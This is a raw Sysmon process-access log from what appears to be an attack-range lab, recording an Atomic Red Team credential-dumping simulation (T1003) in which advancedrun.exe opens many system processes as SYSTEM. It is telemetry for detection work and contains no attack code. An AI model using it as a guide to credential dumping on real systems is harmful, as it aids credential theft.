17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967471Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967470Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967469Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967468Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967467Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967466Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967465Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967464Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967463Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967462Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003967461Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967460Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003967459Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967458Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003967457Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003967456Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003967455Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 